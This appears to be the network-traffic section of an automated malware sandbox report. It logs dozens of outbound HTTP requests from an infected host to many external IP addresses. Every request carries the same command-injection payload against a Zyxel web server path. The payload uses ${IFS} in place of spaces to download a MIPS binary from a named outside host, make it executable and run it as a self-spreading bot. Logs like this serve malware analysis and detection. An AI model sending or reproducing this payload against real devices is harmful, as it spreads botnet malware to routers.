                                                  Jan 19, 2024 18:23:54.014902115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3946192.168.2.134269644.241.193.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.014987946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3947192.168.2.1358140128.65.67.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015041113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3948192.168.2.134791899.237.82.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015096903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3949192.168.2.1338026162.194.239.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015144110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3950192.168.2.1339624223.111.87.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015187979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3951192.168.2.1333920158.189.67.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015248060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3952192.168.2.1336058110.160.22.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015284061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3953192.168.2.134090284.127.118.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015345097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3954192.168.2.1353092181.251.72.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015414953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3955192.168.2.133909614.46.228.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015465021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3956192.168.2.13423629.237.201.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015517950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3957192.168.2.1347102221.227.238.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015587091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3958192.168.2.134340069.49.244.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015639067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3959192.168.2.1353980117.230.5.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015675068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3960192.168.2.1345226213.199.151.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015728951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3961192.168.2.133447092.38.129.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015768051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3962192.168.2.1341538211.114.167.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015827894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3963192.168.2.134398471.62.201.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015855074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3964192.168.2.134170832.218.147.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015907049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3965192.168.2.134531084.39.6.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015954018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3966192.168.2.134080663.120.54.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.015989065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3967192.168.2.1357966101.4.115.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016068935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3968192.168.2.135609047.75.196.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016117096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3969192.168.2.1347994162.229.171.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016171932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3970192.168.2.1359714174.59.194.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016227961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3971192.168.2.1342346137.69.112.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016298056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3972192.168.2.13574768.235.244.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016361952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3973192.168.2.134034642.130.171.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016402960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3974192.168.2.1341464216.89.98.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016442060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3975192.168.2.1354456191.236.43.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016500950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3976192.168.2.1342212217.74.24.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016557932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3977192.168.2.1341860174.118.151.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016608953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3978192.168.2.133990450.188.24.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016648054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3979192.168.2.1350644148.58.107.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016701937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3980192.168.2.133330613.120.11.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016762018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3981192.168.2.134316625.213.128.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016809940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3982192.168.2.1339982104.157.230.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016850948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3983192.168.2.134788225.246.42.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016896963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3984192.168.2.1342762118.90.215.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.016948938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3985192.168.2.1360876110.182.37.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017004967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3986192.168.2.1346514172.11.102.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017055988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3987192.168.2.136036653.75.181.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017117977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3988192.168.2.1360260195.122.171.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017175913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3989192.168.2.133419469.114.19.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017225027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3990192.168.2.1344780199.228.90.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017265081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3991192.168.2.1344426106.253.134.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017322063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3992192.168.2.13428601.2.91.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017353058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3993192.168.2.1341744213.153.168.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017406940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3994192.168.2.133916259.55.222.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017484903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3995192.168.2.1340900162.97.120.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017525911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3996192.168.2.133758823.17.181.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017601013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3997192.168.2.1354380202.228.163.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017652035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3998192.168.2.1335500216.37.250.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017707109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3999192.168.2.1339206210.109.188.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017782927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4000192.168.2.1345600119.64.226.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017837048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4001192.168.2.1357146172.65.74.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017903090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4002192.168.2.1353668126.94.86.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.017973900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4003192.168.2.133718258.48.113.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018028021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4004192.168.2.1337006151.13.184.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018098116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4005192.168.2.1359494157.157.51.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018151045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4006192.168.2.1350150181.47.105.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018192053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4007192.168.2.1350690176.92.183.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:54.018244982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4008192.168.2.1347564161.226.105.0443
                                                  TimestampBytes transferredDirectionData
